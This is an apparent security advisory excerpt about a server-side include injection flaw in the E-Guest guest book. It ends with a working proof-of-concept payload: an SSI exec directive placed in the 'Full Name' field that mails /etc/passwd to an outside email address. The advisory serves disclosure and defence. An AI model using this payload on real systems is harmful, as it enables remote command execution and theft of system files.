7 lines
No EOL
486 B
Text
7 lines
No EOL
486 B
Text
source: http://www.securityfocus.com/bid/5129/info
|
|
|
|
E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.
|
|
|
|
E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.
|
|
|
|
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"--> |